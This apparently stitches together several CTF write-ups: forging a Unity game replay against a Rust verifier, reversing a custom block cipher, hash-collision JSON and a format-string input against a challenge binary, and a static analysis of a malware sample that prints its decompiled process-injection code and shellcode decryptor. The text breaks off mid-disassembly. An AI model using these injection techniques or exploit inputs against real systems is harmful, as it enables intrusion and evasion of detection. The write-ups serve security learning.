Challenge Name: A_REAL_CTF
CTF: Lake CTF 2025
Category: Unity / Rust

The challenge provided:

• a zip file containing a Unity game
• an ELF file name verifier written in Rust

The game

The A_REAL_CTF game consisted in a simple parkour game, where you are supposed to jump from block to block to reach a flag (an actual one), and then come back, to reach a blue block.

Onece you reach the blue block, you can save a binary file and then a new text box appears in the game saying “Response from the server: Simulation successful but no flag for you” (or sometimes “Simulation failed”).

So, basically the verifier ELF is the server of the game, and the game itself uploads a file to the server letting you save it. If the file uploaded is “correct” in some sense, the server will give us the flag.

Reversing the communication protocol

First of all, we need to understand how the game communicates with the server. The first thing I did was to sniff traffic via Wireshark, but unfortunately the traffic was encrypted via TLS.

So, I decided to decompile the Unity game. Uploaded the Assembly-CSharp.dll file to dnSpy and started to explore the code.

It wasn’t hard to find this code:

using System;
using System.Threading.Tasks;
using UnityEngine.Networking;

// Token: 0x02000012 RID: 18
public class PostRequest
{
	// Token: 0x06000042 RID: 66 RVA: 0x0000315C File Offset: 0x0000135C
	public static async Task<string> SendAsync(string url, byte[] bodyRaw)
	{
		string text;
		using (UnityWebRequest request = new UnityWebRequest(url, "POST"))
		{
			request.uploadHandler = new UploadHandlerRaw(bodyRaw);
			request.downloadHandler = new DownloadHandlerBuffer();
			UnityWebRequestAsyncOperation operation = request.SendWebRequest();
			while (!operation.isDone)
			{
				await Task.Yield();
			}
			if (request.result == UnityWebRequest.Result.ConnectionError || request.result == UnityWebRequest.Result.ProtocolError)
			{
				throw new Exception(request.error);
			}
			text = request.downloadHandler.text;
		}
		return text;
	}
}

Nothing fancy, just a simple POST request sending a byte array. So the server will probably be just a http server receiving a POST request with a binary body.

Replay file

Now that we know how client and server communicate, we need to understand what kind of file the client is sending to the server. To do so, I kept investingating the Unity code with dnSpy, and found these classes:

using System;
using System.Collections.Generic;

// Token: 0x0200000C RID: 12
public struct Replay
{
	// Token: 0x04000027 RID: 39
	public const ulong MAGIC = 72848253210177UL;

	// Token: 0x04000028 RID: 40
	public const ushort VERSION = 1;

	// Token: 0x04000029 RID: 41
	public ushort levelId;

	// Token: 0x0400002A RID: 42
	public List<FrameRecord> frames;
}

using System;
using System.IO;
using SFB;
using UnityEngine;

// Token: 0x02000011 RID: 17
internal class ReplayWriter
{
	// Token: 0x06000039 RID: 57 RVA: 0x00002ED8 File Offset: 0x000010D8
	private ReplayWriter(Replay replay)
	{
		this.replay = replay;
	}

	// Token: 0x0600003A RID: 58 RVA: 0x00002EE8 File Offset: 0x000010E8
	public static void SaveReplay(Replay replay)
	{
		Singleton<CursorController>.Instance.UnlockCursor();
		string text = StandaloneFileBrowser.SaveFilePanel("Save Binary File", "", "data", "bin");
		Singleton<CursorController>.Instance.LockCursor();
		if (text.Length == 0 || string.IsNullOrEmpty(text))
		{
			return;
		}
		File.WriteAllBytes(text, ReplayWriter.replayToBytes(replay));
	}

	// Token: 0x0600003B RID: 59 RVA: 0x00002F40 File Offset: 0x00001140
	public static async void SendReplay(byte[] bodyRaw)
	{
		if (string.IsNullOrEmpty(ReplayWriter.serverURL))
		{
			string text = Path.Combine(Application.dataPath, "../server.txt");
			if (!File.Exists(text))
			{
				Singleton<HUD>.Instance.SendNotification("server.txt file not found at " + text);
				return;
			}
			ReplayWriter.serverURL = File.ReadAllText(text).Trim();
		}
		Singleton<HUD>.Instance.SendNotification("Uploading replay...");
		try
		{
			string text2 = await PostRequest.SendAsync(ReplayWriter.serverURL, bodyRaw);
			Singleton<HUD>.Instance.SendNotification("Response from server: \n" + text2);
		}
		catch (Exception ex)
		{
			Debug.LogError("Error: " + ex.Message);
		}
	}

	// Token: 0x0600003C RID: 60 RVA: 0x00002F77 File Offset: 0x00001177
	public static void UploadReplay(Replay replay)
	{
		ReplayWriter.SendReplay(ReplayWriter.replayToBytes(replay));
	}

	// Token: 0x0600003D RID: 61 RVA: 0x00002F84 File Offset: 0x00001184
	private static byte[] replayToBytes(Replay replay)
	{
		ReplayWriter replayWriter = new ReplayWriter(replay);
		byte[] array;
		using (MemoryStream memoryStream = new MemoryStream())
		{
			using (BinaryWriter binaryWriter = new BinaryWriter(memoryStream))
			{
				replayWriter.writeHeader(binaryWriter);
				replayWriter.writeFrames(binaryWriter);
			}
			array = memoryStream.ToArray();
		}
		return array;
	}

	// Token: 0x0600003E RID: 62 RVA: 0x00002FF0 File Offset: 0x000011F0
	private void writeHeader(BinaryWriter writer)
	{
		if (this.replay.frames.Count > 65535)
		{
			throw new Exception("Too many frames in replay to save!");
		}
		writer.Write(72848253210177UL);
		writer.Write(1);
		writer.Write(this.replay.levelId);
		writer.Write((ushort)this.replay.frames.Count);
	}

	// Token: 0x0600003F RID: 63 RVA: 0x00003060 File Offset: 0x00001260
	private void writeFrames(BinaryWriter writer)
	{
		foreach (FrameRecord frameRecord in this.replay.frames)
		{
			this.writeFrame(writer, frameRecord);
		}
	}

	// Token: 0x06000040 RID: 64 RVA: 0x000030BC File Offset: 0x000012BC
	private void writeFrame(BinaryWriter writer, FrameRecord frame)
	{
		this.writePlayer(writer, frame.playerRecord);
	}

	// Token: 0x06000041 RID: 65 RVA: 0x000030CC File Offset: 0x000012CC
	private void writePlayer(BinaryWriter writer, PlayerRecord player)
	{
		writer.Write(player.position.x);
		writer.Write(player.position.y);
		writer.Write(player.position.z);
		writer.Write(player.rotation.x);
		writer.Write(player.rotation.y);
		writer.Write(player.rotation.z);
		writer.Write(player.rotation.w);
		writer.Write((byte)player.playerActions);
	}

	// Token: 0x04000033 RID: 51
	private Replay replay;

	// Token: 0x04000034 RID: 52
	public static string serverURL;
}

So, the file sent is a binary file containing the information for a Replay of the game. The Replay struct contains:

• a magic number
• a version number
• a level ID
• a list of FrameRecord structs

Each FrameRecord contains a PlayerRecord, which contains:

• position (x, y, z)
• rotation (x, y, z, w)
• player actions (as a byte)

The verifier

Now its time to analyze the verifier ELF file. I opened up IDA Free and searched for the string “flag”. After a bit of reversing, I found out a function that calls a method verifier::replay::read_replay and shortly after verfier::simulator::Simulation::run.
This function is the main function of the verifier, as it reads the replay file and then simulates it using the game physics (collisions, gravity, …) and checks if the game is won (flag and blue block reached). This prevents users from sending arbitrary replay files or using cheats to fly/teleport etc.

If this last function calls returns false, then the program send to the game “Simulation failed”, otherwise it prints “Simulation successful but no flag for you” if the lever ID is not 1 or it sends the flag if the simulation is correct and the level ID is 1.

Easy right? I just need to win level 1 and the game will send me the flag! Problem is, inside the game there is no level 1, only level 0.

Searching for level 1

There was no trace about level 1 inside the Unity game files. The only possibility was that level 1 was hidden somewhere inside the verifier, after all that code is able to implement simulate collisions and check if the flag and blue block are reached, so the level data must be somewhere.

After a bit of reversing, I found a function verifier::game_config::read_level that hopefully reads the level data. The function get called with 2 parameters, the first one passed by reference. So, I guessed, the first parameter is a struct where the level data is stored. This function is called 2 times, once for level 0 and once for level 1.

I tried to reverse this function to be able to reconstruct this struct, but it was too complicated. So, I decided to use a different approach: by using GBD, I set a breakpoint at the beginning of the function, saved the address stored in rdi then dumped the memory at that address when the fucntion returned.

This is the content of the memory dumped for level 0:

pwndbg> x/128wx 0x7fffffffcef0 
0x7fffffffcef0:	0x80000000	0x80000000	0x80000000	0x3f800000
0x7fffffffcf00:	0x41caf3b6	0x40b6e148	0x00000000	0x40000000
0x7fffffffcf10:	0x40000000	0x40000000	0x00000000	0x0f000000
0x7fffffffcf20:	0x80000000	0x80000000	0x80000000	0x3f800000
0x7fffffffcf30:	0xbfc147ae	0x40d23d71	0x40d9a9fc	0x3f800000
0x7fffffffcf40:	0x40800000	0x3f800000	0x00000000	0x0f000000
0x7fffffffcf50:	0x00000006	0x00000000	0x556c2230	0x00005555
0x7fffffffcf60:	0x00000006	0x00000000	0xf7ca0000	0x00007fff
0x7fffffffcf70:	0xc11cf5c3	0x40000000	0x3f400003	0x40000000
[...]

But how to intepret this data? Going back to IDA, I found out that these data should contains coordinates of spawn points and the coordinates of the flag. Then a pointer is stored, pointing to another area in memory, that contains the coordinates and dimensions of the blocks composing the level.

But how do I know what represents what in these data? I decided to use UnityExplorer to dump the coordinates of the blocks in level 0, and then match them with the data dumped from the verifier.

By this comparison, I was able to recover the position of relevant information inside the dumped data.

pwndbg> x/128wx 0x7fffffffcef0 
0x7fffffffcef0:	0x80000000	0x80000000	0x80000000	0x3f800000
0x7fffffffcf00:	0x41caf3b6	0x40b6e148	0x00000000	0x40000000 # X,Y,Z of the spawn point/blue block
0x7fffffffcf10:	0x40000000	0x40000000	0x00000000	0x0f000000
0x7fffffffcf20:	0x80000000	0x80000000	0x80000000	0x3f800000
0x7fffffffcf30:	0xbfc147ae	0x40d23d71	0x40d9a9fc	0x3f800000 # X,Y,Z of the flag
0x7fffffffcf40:	0x40800000	0x3f800000	0x00000000	0x0f000000
0x7fffffffcf50:	0x00000006	0x00000000	0x556c2230	0x00005555 # 0x5555556c2230 is a pointer to the blocks data
0x7fffffffcf60:	0x00000006	0x00000000	0xf7ca0000	0x00007fff
0x7fffffffcf70:	0xc11cf5c3	0x40000000	0x3f400003	0x40000000
[...]

pwndbg> x/80wx 0x5555556c2230
0x5555556c2230:	0x80000000	0x80000000	0x80000000	0x3f800000
0x5555556c2240:	0x41c23d71	0x3fdd70a4	0x4063d70a	0x40a33333 # X,Y,Z coordinates and scaleX of block 1
0x5555556c2250:	0x40b92aae	0x415a75a3	0x00000000	0x0f000000 # scaleY and scaleZ of block 1
0x5555556c2260:	0x80000000	0x80000000	0x80000000	0x3f800000
0x5555556c2270:	0xc0166666	0x3fdd70a4	0x4063d70a	0x40a33333 # X,Y,Z coordinates and scaleX of block 2
0x5555556c2280:	0x40b92aae	0x415a75a3	0x00000000	0x0f000000 # scaleY and scaleZ of block 2
0x5555556c2290:	0x80000000	0x80000000	0x80000000	0x3f800000
0x5555556c22a0:	0x419147ae	0x404f5c29	0x401322d1	0x40a9999a # X,Y,Z coordinates and scaleX of block 3
0x5555556c22b0:	0x3f800000	0x3f800000	0x00000000	0x0f000000 # scaleY and scaleZ of block 3
0x5555556c22c0:	0x80000000	0x80000000	0x80000000	0x3f800000
0x5555556c22d0:	0x415947ae	0x407b126f	0x40923d71	0x3fa00000 # X,Y,Z coordinates and scaleX of block 4
0x5555556c22e0:	0x3f8b851f	0x3ffeb852	0x00000000	0x0f000000 # scaleY and scaleZ of block 4
0x5555556c22f0:	0x80000000	0x80000000	0x80000000	0x3f800000
0x5555556c2300:	0x412e6666	0x407b126f	0x40d75c29	0x3fa00000 # X,Y,Z coordinates and scaleX of block 5
0x5555556c2310:	0x3f8b851f	0x3ffeb852	0x00000000	0x0f000000 # scaleY and scaleZ of block 5
0x5555556c2320:	0x80000000	0x80000000	0x80000000	0x3f800000
0x5555556c2330:	0x40b20c4a	0x40266666	0x40d1eb85	0x405d70a4 # X,Y,Z coordinates and scaleX of block 6
0x5555556c2340:	0x3f8b851f	0x3ec28f5c	0x00000000	0x0f000000 # scaleY and scaleZ of block 6

Now that I know how the level data is stored in memory, I can easily reconstruct all the relevant information (spawn point, flag point, blocks data) for level 1 by repeating the same process.

By doing so, I obtained the following data for level 1:

# x coordinates of the blocks
x = [24.280000686645508, 2.619999885559082, 18.15999984741211, 14.1899995803833, 12.010000228881836, 10.012999534606934, 8.09000015258789, 6.320000171661377, 17.170000076293945, 18.170000076293945, 16.079999923706055]
# y coordinates of the blocks
y = [1.7300000190734863, 10.510000228881836, 5.909999847412109, 9.569999694824219, 10.572999954223633, 11.770999908447266, 11.770999908447266, 11.770999908447266, 6.380000114440918, 7.050000190734863, 8.300000190734863]
# z coordinates of the blocks
z = [33.40999984741211, 36.5, 32.14900207519531, 37.20000076293945, 36.70000076293945, 36.70000076293945, 36.70000076293945, 36.70000076293945, 34.42000198364258, 37.20000076293945, 37.29999923706055]
# scales of the blocks
d1 = [5.099999904632568, 3.069999933242798, 5.300000190734863, 1.600000023841858, 1.600000023841858, 0.5, 0.5, 0.5, 1.25, 1.25, 1.5]
d2 = [5.786459922790527, 1.3899999856948853, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.4000000059604645, 1.090000033378601, 1.090000033378601]
d3 = [13.653719902038574, 2.640000104904175, 1.0, 1.0, 1.0, 1.5, 1.5, 1.5, 1.9900000095367432, 1.9900000095367432, 0.3199999928474426]

# x,y,z of the spawn point/blue block
blue_block = [25.368999481201172, 5.715000152587891, 29.850000381469727]

# x,y,z of the flag
flag = [1.9299999475479126, 13.029999732971191, 36.900001525878906]

Reconstructing the level 1

Now that I have all the data needed to reconstruct level 1, I just need to write a script that changes objects properties in the Unity game to match level 1 data.

For this purpose I used again UnityExplorer:

using UnityEngine;
using System.Linq;

// ===== YOUR DATA =====
float[] x = {24.2800007f, 2.6199999f, 18.16f, 14.19f, 12.01f, 10.013f, 8.09f, 6.32f, 17.17f, 18.17f, 16.08f};
float[] y = {1.73f, 10.51f, 5.91f, 9.57f, 10.573f, 11.771f, 11.771f, 11.771f, 6.38f, 7.05f, 8.3f};
float[] z = {33.41f, 36.5f, 32.149f, 37.2f, 36.7f, 36.7f, 36.7f, 36.7f, 34.42f, 37.2f, 37.3f};

float[] d1 = {5.1f, 3.07f, 5.3f, 1.6f, 1.6f, 0.5f, 0.5f, 0.5f, 1.25f, 1.25f, 1.5f};
float[] d2 = {5.78646f, 1.39f, 1f, 1f, 1f, 1f, 1f, 1f, 0.4f, 1.09f, 1.09f};
float[] d3 = {13.65372f, 2.64f, 1f, 1f, 1f, 1.5f, 1.5f, 1.5f, 1.99f, 1.99f, 0.32f};

Vector3 blueBlock = new Vector3(25.369f, 5.715f, 29.85f);
Vector3 flagPos   = new Vector3(1.93f, 13.03f, 36.9f);

// ===== FIND BLOCKS (by name or tag) =====
// Change this string if your block objects are named differently!
var blocks = GameObject.FindObjectsOfType<Transform>()
    .Where(t => t.name.ToLower().Contains("block"))
    .OrderBy(t => t.name)
    .ToArray();

for(int i = 0; i < blocks.Length && i < x.Length; i++)
{
    blocks[i].position = new Vector3(x[i], y[i], z[i]);
    blocks[i].localScale = new Vector3(d1[i], d2[i], d3[i]);
}

Debug.Log($"Updated {Mathf.Min(blocks.Length, x.Length)} blocks");


// ===== BLUE SPAWN BLOCK =====
var blue = GameObject.FindObjectsOfType<Transform>()
    .FirstOrDefault(t => t.name.ToLower().Contains("blue"));

if(blue != null)
{
    blue.position = blueBlock;
    Debug.Log("Blue spawn moved");
}
else Debug.LogWarning("Blue block not found");


// ===== FLAG =====
var flagObj = GameObject.FindObjectsOfType<Transform>()
    .FirstOrDefault(t => t.name.ToLower().Contains("flag"));

if(flagObj != null)
{
    flagObj.position = flagPos;
    Debug.Log("Flag moved");
}
else Debug.LogWarning("Flag not found");

After running this script inside the Unity game, level 1 was finally reconstructed!

Winning level 1

Now that level 1 was reconstructed, I just had to win it. Actually it was impossible to win locally, cause the flag collisions were not working, but it didt matter, I just had to reach the starting position after touching the flag.

Then i saved the replay file, patched the level ID using python, opened again the game and uploaded the patched replay file to the verifier.

Flag: DCTF{77cf682bd72ae03d3644c1f43b97020fcc6446b2c88c02757be0e46c40dcc90b}

The file provided is a Mach-O 64-bit executable.

The executable reads a password from argv and validates it. If the password is correct it print ‘Correct’.

The algorithm used to validate the password works like this:

• the buffer buffer_1 and int_buffer are filled in a way that does not depend on user input
• the input is padded to reach length multiple of 8
• a chunk of 8 bytes of the input gets XORed with a xor_key ( initially an initialization vector )
• this XORed value is passed to a final function that encrypts it, and the resulting chunk is saved in the output buffer
• the xor_key is updated with the output of the previous chunk
• a new chunk get xorred and passed to final, and so on…

This is basically a CBC block cipher

  xor_key = *(byte (*) [8])IV;
  for (i = 0; i < (int)len_padded; i = i + 8) {
    for (j = 0; j < 8; j = j + 1) {
      xorred[j] = input_padded[i + j] ^ xor_key[j];
    }
    final(xorred,buffer_1,size,int_buffer,output + i);
    xor_key = *(byte (*) [8])(output + i);
  }
  return;

The reversed final function looks like this:

void final(byte *xorred_input,byte *buffer_1,int size,int *int_buffer,undefined8 out)

{
  byte bVar1;
  int y;
  int k;
  byte scramble [8];
  byte byte;
  int j;
  uint integrer;
  int i;
  int m;
  byte result [8];
  byte *input;
  int div;
  
  result = *(byte (*) [8])xorred_input;
  for (m = 0; m < 8; m = m + 1) {
    div = 0;
    if (size != 0) {
      div = m / size;
    }
    result[m] = result[m] ^ buffer_1[m - div * size];
  }
  for (i = 0; i < 4; i = i + 1) {
    integrer = int_buffer[i];
    for (j = 0; j < 8; j = j + 1) {
      byte = (char)integrer + (char)j + (char)i;
      result[j] = (&sbox)[(int)(uint)(result[j] ^ byte)];
    }
    for (k = 0; k < 8; k = k + 1) {
      scramble[(k * 3 + i) % 8] = result[k];
    }
    result[0] = scramble[0];
    result[1] = scramble[1];
    result[2] = scramble[2];
    result[3] = scramble[3];
    result[4] = scramble[4];
    result[5] = scramble[5];
    result[6] = scramble[6];
    result[7] = scramble[7];
    for (y = 0; y < 8; y = y + 1) {
      result[y] = result[y] ^ (byte)(integrer >> (ulong)((y % 4) * 8 & 0x1f));
      bVar1 = rot_left(result[y],(i + 1) % 8);
      result[y] = bVar1;
    }
  }
  ___memcpy_chk(out,result,8,0xffffffffffffffff);
  return;
}

So I implemented a python script to reverse this process:

#!/usr/bin/env python3
from pwn import xor

SBOX = [
    0xd7, 0xc7, 0x0c, 0x56, 0xa3, 0x3b, 0x60, 0x55, 0x2f, 0x88, 0x5d, 0x1d, 0x5e, 0x23, 0x08, 0x3d,
    0x32, 0x40, 0x5c, 0x46, 0x06, 0x0b, 0x21, 0x25, 0xc4, 0x3a, 0x04, 0x78, 0x2b, 0x11, 0x58, 0x0d,
    0x37, 0x35, 0xa5, 0x36, 0x6d, 0x2c, 0x00, 0x92, 0x2a, 0x4f, 0x13, 0x28, 0xdb, 0x64, 0x0f, 0x8a,
    0x1c, 0xc6, 0xd5, 0xb4, 0xa6, 0x9c, 0x47, 0x82, 0x3f, 0x1f, 0x83, 0x39, 0x48, 0x93, 0x9b, 0x7a,
    0x22, 0x07, 0x77, 0xe4, 0x63, 0xb7, 0xa0, 0x72, 0x73, 0x4e, 0x6f, 0x09, 0x42, 0x5a, 0x8b, 0x6a,
    0x81, 0x33, 0x67, 0xfd, 0xbd, 0x4b, 0xe1, 0x62, 0x1a, 0xb8, 0x5f, 0x7e, 0xeb, 0x26, 0x79, 0x98,
    0x85, 0x70, 0x65, 0x10, 0x96, 0x1b, 0xf3, 0xb0, 0xee, 0xae, 0x7d, 0x6e, 0x19, 0xba, 0xa9, 0xc8,
    0x12, 0x05, 0x3c, 0x91, 0x9d, 0xa7, 0xe3, 0xe0, 0x03, 0x44, 0xad, 0x45, 0xb2, 0x94, 0x38, 0xf8,
    0xd1, 0x84, 0x8c, 0x61, 0x9a, 0x1e, 0xd3, 0xc1, 0x0a, 0xcb, 0x34, 0x95, 0xde, 0x9f, 0x7c, 0x69,
    0x76, 0x17, 0x6b, 0x20, 0x71, 0x50, 0x30, 0x66, 0x7b, 0xbe, 0xd8, 0xe5, 0x2e, 0xca, 0x4c, 0xb9,
    0x02, 0xc3, 0xc0, 0x01, 0xed, 0x5b, 0x57, 0xd6, 0xe9, 0xcf, 0xa8, 0x52, 0x97, 0x16, 0xb5, 0x8e,
    0x43, 0x54, 0x90, 0xdd, 0xaf, 0xd2, 0x8d, 0xb1, 0xbf, 0xbb, 0xff, 0xcc, 0xf2, 0x8f, 0xec, 0x2d,
    0xe6, 0xf6, 0xf7, 0xfa, 0x41, 0x31, 0xd4, 0x15, 0xc9, 0xce, 0xef, 0xfc, 0xc2, 0xda, 0xbc, 0xea,
    0xb6, 0xb3, 0xe7, 0x68, 0xaa, 0x0e, 0xa4, 0xe2, 0x9e, 0xac, 0xdf, 0x59, 0xf5, 0x89, 0x18, 0xf9,
    0x86, 0x27, 0x6c, 0xcd, 0xd9, 0x51, 0x74, 0xa1, 0xdc, 0xab, 0x14, 0x29, 0x80, 0x7f, 0x75, 0x49,
    0x24, 0x53, 0xd0, 0xf4, 0x4a, 0xf0, 0x4d, 0xf1, 0x3e, 0xfb, 0xfe, 0xc5, 0x87, 0xe8, 0xa2, 0x99
]

INV_SBOX = [0] * 256

data = bytes([ 0x84, 0x52, 0x5f, 0x9c, 0xf0, 0xa8, 0x5a, 0x21 ])


for i, val in enumerate(SBOX):
    INV_SBOX[val] = i

def rot_left(byte_val, amount):
    byte_val &= 0xFF
    amount = amount % 8
    return ((byte_val << amount) | (byte_val >> (8 - amount))) & 0xFF

def rot_right(byte_val, amount):
    byte_val &= 0xFF
    amount = amount % 8
    return ((byte_val >> amount) | (byte_val << (8 - amount))) & 0xFF

def undo_final(encrypted_block, bufferozzo, integer_buffer):
    hash_copy = list(encrypted_block)
    
    for j in range(3, -1, -1):  # j = 3, 2, 1, 0
        int_element = integer_buffer[j]
        
        for k in range(8):
            hash_copy[k] = rot_right(hash_copy[k], (j + 1) % 8)
            hash_copy[k] ^= (int_element >> ((k % 4) * 8)) & 0xFF
        
        temp = [0] * 8
        for ii in range(8):
            original_pos = (ii * 3 + j) % 8
            temp[ii] = hash_copy[original_pos]
        hash_copy = temp
        
        for jj in range(8):
            chiave = (int_element + jj + j) & 0xFF
            hash_copy[jj] = INV_SBOX[hash_copy[jj]]
            hash_copy[jj] ^= chiave
    
    for i in range(8):
        hash_copy[i] ^= bufferozzo[i % len(bufferozzo)]
    
    return bytes(hash_copy)




def final_test(hash_block, bufferozzo, integer_buffer):
    hash_copy = list(hash_block)
    for i in range(8):
        hash_copy[i] ^= bufferozzo[i % len(bufferozzo)]
    for j in range(4):
        int_element = integer_buffer[j]
        for jj in range(8):
            chiave = (int_element + jj + j) & 0xFF
            hash_copy[jj] = SBOX[hash_copy[jj] ^ chiave]
        temp = [0] * 8
        for ii in range(8):
            temp[(ii * 3 + j) % 8] = hash_copy[ii]
        hash_copy = temp
        for k in range(8):
            hash_copy[k] ^= (int_element >> ((k % 4) * 8)) & 0xFF
            hash_copy[k] = rot_left(hash_copy[k], (j + 1) % 8)
    return bytes(hash_copy)



if __name__ == "__main__":
    flag_cipher = [ 0x93, 0x25, 0x4b, 0x0d, 0x8f, 0x3b, 0x61, 0x44, 0x41, 0x51, 0x54, 0x8b, 0xc4, 0x39, 0x88, 0x41, 0x53, 0xe1, 0xa5, 0xc8, 0x35, 0xd2, 0x3b, 0x55, 0x1c, 0xca, 0x38, 0x53, 0x6d, 0x9c, 0xb2, 0x77, 0xd6, 0x2d, 0xad, 0x89, 0xea, 0xba, 0xbe, 0x35, 0x5e, 0x00, 0x3d, 0xca, 0xfa, 0x54, 0x87, 0x6e, 0xa6, 0x95, 0xac, 0xef, 0xeb, 0x13, 0xe5, 0x94, 0x04, 0xaa, 0x93, 0xbc, 0x3c, 0x99, 0x7e, 0xdd, 0xc0, 0x3e, 0x38, 0xea, 0x82, 0xf1, 0x1b, 0x06 ]

    bufferozzo =  b'\xb4\x05\x99\xa2\xf1Q%\xea\xb4\x05\x99\xa2\xf1Q%\xea'
    integer_buffer =  [119599210, 3228966940, 2162966584, 2412172536]

    for i in range(0, len(flag_cipher), 8):
        enc_block = bytes(flag_cipher[i:i+8])
        decrypted_block = undo_final(enc_block, bufferozzo, integer_buffer)

        plain = xor(decrypted_block, data)
        data = enc_block
        print(plain.decode('utf-8', errors='ignore'), end='')

Note: the values contained in the buffer were found using partial static analysis and a debugger on macOS

Reverse Engineering - burnt-out

Flag: DCTF{n0w_y0Ur3_7h1nk1n6_w17h_d4t4}

The challenge accepts a JSON input which describes actions to be executed by the binary. The goal is to craft a JSON that triggers the code path that prints the flag.

The challenge provides the following example input:

{
  "on_start": [
    {
      "$type": "log_action_t",
      "message": "Hello World!"
    }
  ]
}

The log_action_t string is associated with a function that prints the message field, so running the binary with the example prints Hello World!.

The binary does not map $type strings to functions directly by name. Instead, it computes a simple hash of the string and compares the result against saved hash values. The hash function (reimplemented in Python) is:

# hash function implemented in python
def calculate_hash(string):
    hash_value = 0
    for position, char in enumerate(string, 1):
        hash_value += ord(char) * position
    return hash_value

This hashing function is not secure: collisions are easy to find, also by hand.

When a function is called using this mechanism, the first parameter is always a pointer to a struct (I refer to it as player_t). After investigating I found out that the first two integer of this struct are the position coordinates of the player and the byte located at offset 9 of this struct control whether or not the flag must be printed. If that value is not zero, then the flag is printed.

So i started searching for a function that writes at that specific offset, and found this:

undefined8 maybe_win(player_t *player,uint *mappa,int *move_direction)

{
  uint uVar1;
  undefined8 uVar2;
  uint next_x;
  uint next_y;
  uint x_coord;
  uint y_coord;
  
  uVar1 = *move_direction - 1;
  if (3 < uVar1) {
    __printf_chk(1,"Assertion failed: ");
    __printf_chk(1,"dir cannot be none");
    __printf_chk(1,&DAT_0010a9f7);
    __printf_chk(1,&DAT_0010a9f7);
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  x_coord = player->x_coord;
  y_coord = player->y_coord;
  next_y = y_coord;
  next_x = x_coord;
  switch(*move_direction) {
  case 1:
    next_y = y_coord - 1;
    break;
  case 2:
    next_y = y_coord + 1;
    break;
  case 3:
    next_x = x_coord - 1;
    break;
  case 4:
    next_x = x_coord + 1;
  }
  uVar2 = CONCAT71((int7)((ulong)((long)&switchD_00101804::switchdataD_0010a84c +
                                 (long)(int)(&switchD_00101804::switchdataD_0010a84c)[uVar1]) >> 8),
                   1);
  if ((next_y < 0x1e) && (next_x < 0x1e)) {
    if (mappa[(ulong)next_x * 0x1e + (ulong)next_y + 2] == 0) {
      if (mappa[(ulong)next_x * 0x1e + (ulong)next_y + 0x386] != 0) {
        return 0;
      }
      mappa[(long)(int)x_coord * 0x1e + (long)(int)y_coord + 2] = 1;
      player->x_coord = next_x;
      player->y_coord = next_y;
      if ((next_x == mappa[0x70a]) && (next_y == mappa[0x70b])) {
        player->flag_ = 1;
        return uVar2;
      }
    }
  }
  return uVar2;
}

This funciton allows the player to move in a direction specified by the move_direction parameter.

As you can see at the very end of this function player->flag_ is set to 1 only if the next position of the player is the correct one. Via debugger I found out that the desired position is only one step away, but its coordinates are randomized.

To trigger the win path we need two things:

• Call this function — this requires providing a $type string whose hash matches that function’s saved hash (0x527e).

• Ensure move_direction is valid; otherwise the function asserts (“dir cannot be none”).

The move_direction parameter is resolved from a dir string in the input using the same weak hashing scheme as $type. Therefore we can craft both a $type and a dir string that map to the required hashes.

{
  "on_start": [
    {
      "$type": "mzzzzzzzzzzzzzzzzae",
      "dir": "fvmmmmaA"
    }
  ]
}

With this JSON the binary executes the target function, moves the player and sets player->flag_ = 1 25% of the times.

Bonus: There was also a format-string vulnerability in the code that could be triggered simply by:

{
  "on_start": [
    {
      "$type": "log_action_t",
      "message": "%d"
    }
  ]
}

The challenge presented us with a password-protected ZIP file. The password was “infected” - a well-known convention in the cybersecurity community used when sharing actual malware samples to prevent accidental execution.

Upon extracting the archive, I found a single file named prog.exe_. The underscore appended to the file extension is a common safety measure that disables automatic execution when double-clicking the file in Windows environments.

These initial observations strongly suggested that we were dealing with real malware rather than a simulated threat. Given the potentially dangerous nature of the sample and the lack of an isolated virtual machine environment, I made the decision to proceed exclusively with static analysis techniques to avoid any risk of system compromise.

Challenge Analysis

Initial Reverse Engineering - Main Function Analysis

Loading the executable into IDA, I quickly identified the main function and began analyzing its behavior. The decompiled code revealed several interesting operations:

int __fastcall main(int argc, const char **argv, const char **envp)
{
    char *buff_ptr; // r8
    _OWORD *v5; // rax
    __int64 counter; // rcx
    // ... variable declarations ...
    
    char Buffer[560]; // [rsp+40h] [rbp-248h] BYREF
    buff_ptr = Buffer;
    v5 = &bytecode_enc;
    counter = 4i64;
    
    // Copy encrypted bytecode to local buffer in chunks
    do {
        buff_ptr += 128;
        // XMM register operations for efficient memory copying
        // ... chunk copying logic ...
        --counter;
    } while ( counter );
    
    // Process injection sequence
    pid = unknown_libname_26(argv[1]);
    sub_140001010("Injecting to PID: %i", pid);
    v18 = unknown_libname_26(argv[1]);
    process = OpenProcess(0x1FFFFFu, 0, v18);
    mem = VirtualAllocEx(process, 0i64, 0x228ui64, 0x3000u, 0x40u);
    WriteProcessMemory(process, mem, Buffer, 0x228ui64, 0i64);
    CreateRemoteThread(process, 0i64, 0i64, (LPTHREAD_START_ROUTINE)mem, 0i64, 0, 0i64);
    CloseHandle(process);
    return 0;
}

(variable and function names were changed by me)

The main function performs several key operations:

1. Shellcode Preparation: It copies bytes from a global variable (bytecode_enc) into a local buffer, processing the data in chunks using XMM registers for efficient memory operations.

2. Process Targeting: It opens a target process using the PID specified as a command-line argument.

3. Memory Allocation: It allocates executable memory space within the target process using VirtualAllocEx with PAGE_EXECUTE_READWRITE permissions.

4. Code Injection: It writes the prepared shellcode buffer into the allocated memory space of the target process.

5. Remote Execution: It creates a new thread in the target process that executes the injected shellcode.

6. Cleanup: It closes the process handle.

This is a classic process injection technique commonly used in malware. The purpose of this approach, rather than executing the shellcode directly, is to mask malicious activity. When the injected code runs, any suspicious behavior (high CPU usage, network connections, file system access) will appear to originate from legitimate processes like notepad.exe or other benign applications, making detection significantly more difficult for both users and security software.

The next step in the analysis was to extract and examine the shellcode stored in the global variable to understand the actual malicious payload.

Shellcode Extraction and Decryption

With the main function behavior understood, the next step was to extract and analyze the actual shellcode stored in the global variable. Loading the binary data into IDA Pro revealed an interesting structure.

The shellcode began with valid x86-64 assembly instructions, but quickly transitioned into what appeared to be random bytes. Upon closer examination of the initial instructions, I discovered a runtime decryption routine:

seg000:0000000000000000 loc_0:                                  ; DATA XREF: seg000:000000000000000A↓o
seg000:0000000000000000                 xor     rcx, rcx
seg000:0000000000000003                 sub     rcx, 0FFFFFFFFFFFFFFC0h
seg000:000000000000000A                 lea     rax, loc_0
seg000:0000000000000011                 mov     rbx, 0E64DDC02B7BACB6Fh
seg000:000000000000001B
seg000:000000000000001B loc_1B:                                 ; CODE XREF: seg000:0000000000000025↓j
